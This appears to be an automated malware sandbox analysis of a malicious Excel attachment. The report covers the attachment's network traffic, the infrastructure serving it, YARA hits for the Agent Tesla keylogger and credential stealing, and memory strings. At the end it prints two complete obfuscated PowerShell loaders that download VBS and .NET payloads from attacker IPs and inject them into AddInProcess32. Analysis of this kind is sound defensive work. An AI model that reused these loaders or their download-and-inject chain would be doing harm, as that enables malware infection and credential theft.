                    Source: global trafficHTTP traffic detected: GET /ppltL HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /EvengIEcache.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.144Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ppltL HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /EvengIEcache.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8983-Connection: Keep-AliveHost: 198.46.178.144If-Range: "d0282dd4eccda1:0"
                    Source: global trafficHTTP traffic detected: GET /eveningfiledatinglover.vbs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.144Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Users_API/negrocock/file_mq5uppna.ldt.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 94.156.65.247
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899E7018 URLDownloadToFileW,7_2_000007FE899E7018
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2E31577.emfJump to behavior
                    Source: global trafficHTTP traffic detected: GET /ppltL HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /EvengIEcache.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.144Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ppltL HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /EvengIEcache.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8983-Connection: Keep-AliveHost: 198.46.178.144If-Range: "d0282dd4eccda1:0"
                    Source: global trafficHTTP traffic detected: GET /eveningfiledatinglover.vbs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.144Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Users_API/negrocock/file_mq5uppna.ldt.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 94.156.65.247
                    Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /madamwebbbbbbbas6444.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: hop.fyi
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: powershell.exe, 0000000C.00000002.504336170.0000000002713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144
                    Source: mshta.exe, 00000004.00000002.466473179.00000000003BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.466473179.000000000034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/EvengIEcache.hta
                    Source: mshta.exe, 00000004.00000003.464522889.00000000003BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.466473179.00000000003BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/EvengIEcache.hta...
                    Source: mshta.exe, 00000004.00000003.464522889.00000000003BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.466473179.00000000003BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/EvengIEcache.hta...e
                    Source: mshta.exe, 00000004.00000003.464522889.00000000003BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/EvengIEcache.hta/
                    Source: mshta.exe, 00000004.00000003.464522889.00000000003BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.466473179.00000000003BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/EvengIEcache.hta6o
                    Source: mshta.exe, 00000004.00000002.466473179.00000000003F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.464522889.00000000003FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/EvengIEcache.htaC:
                    Source: mshta.exe, 00000004.00000003.464522889.00000000003BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/EvengIEcache.htaZ
                    Source: mshta.exe, 00000004.00000003.465933300.0000000002BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/EvengIEcache.htahttp://198.46.178.144/EvengIEcache.hta0
                    Source: mshta.exe, 00000004.00000003.465933300.0000000002BFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/EvengIEcache.htax
                    Source: powershell.exe, 00000007.00000002.485211497.0000000002A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/eveningfil
                    Source: powershell.exe, 00000007.00000002.485211497.0000000002A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/eveningfiledatinglover.vbs
                    Source: powershell.exe, 00000007.00000002.485211497.0000000002A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/eveningfiledatinglover.vbsp
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C28A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/eveningfiledatinglover.vbst
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C28A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/eveningfiledatinglover.vbstt
                    Source: mshta.exe, 00000004.00000003.463853080.000000000040D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.466473179.000000000040E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.464522889.000000000040E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/f
                    Source: mshta.exe, 00000004.00000003.463853080.000000000040D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.466473179.000000000040E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.464522889.000000000040E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/j
                    Source: powershell.exe, 0000000C.00000002.504336170.0000000002713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/madamwebbbbbbbas6444.txt
                    Source: powershell.exe, 0000000C.00000002.504336170.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.194
                    Source: powershell.exe, 0000000C.00000002.503395104.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.194/imge/new-image_v.jpg
                    Source: powershell.exe, 0000000C.00000002.504336170.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.194/imge/new-image_v.jpgxRm;
                    Source: wscript.exe, 0000000B.00000003.516835984.0000000000413000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.517801046.0000000000485000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.516954761.0000000000411000.00000004.00000020.00020000.00000000.sdmp, eveningfiledatinglover[1].vbs.7.dr, eveningfiledatinglover.vBS.7.drString found in binary or memory: http://94.156.65.247/Users_API/negrocock/file_mq5uppna.ldt.txt
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: powershell.exe, 00000007.00000002.490233205.000000001A626000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C30D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
                    Source: powershell.exe, 00000007.00000002.485211497.0000000002A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: mshta.exe, 00000004.00000002.466473179.00000000003F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.464522889.00000000003FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hop.fyi/
                    Source: mshta.exe, 00000004.00000002.466473179.00000000003BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hop.fyi/ppltL
                    Source: Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx, 46930000.0.drString found in binary or memory: http://hop.fyi/ppltLB
                    Source: mshta.exe, 00000004.00000002.466473179.000000000034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hop.fyi/ppltLP8
                    Source: mshta.exe, 00000004.00000002.466473179.000000000034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hop.fyi/ppltLT8
                    Source: mshta.exe, 00000004.00000002.466473179.000000000034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hop.fyi/ppltLh
                    Source: mshta.exe, 00000004.00000002.466473179.000000000034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hop.fyi/ppltLl
                    Source: AddInProcess32.exe, 0000000E.00000002.619170569.0000000002431000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.619170569.00000000024D2000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.619170569.00000000024EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: powershell.exe, 0000000C.00000002.510894342.000000001241D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.618907462.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.619170569.0000000002431000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.619170569.00000000024D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 00000007.00000002.489807943.0000000012341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: powershell.exe, 00000007.00000002.485211497.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.504336170.0000000002371000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.619170569.0000000002431000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.619170569.00000000024D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: powershell.exe, 0000000C.00000002.510894342.000000001241D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.618907462.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: powershell.exe, 00000007.00000002.489807943.0000000012341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000007.00000002.489807943.0000000012341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000007.00000002.489807943.0000000012341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000007.00000002.489807943.0000000012341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000007.00000002.490786833.000000001C280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, cPKWk.cs.Net Code: VG0StEU
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 12.2.powershell.exe.12778558.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 12.2.powershell.exe.12778558.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3324, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxOLE: Microsoft Excel 2007+
                    Source: 46930000.0.drOLE: Microsoft Excel 2007+
                    Source: ~DF9497146B9A365AE9.TMP.0.drOLE: Microsoft Excel 2007+
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\EvengIEcache[1].htaJump to behavior
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgIDJump to behavior
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX"
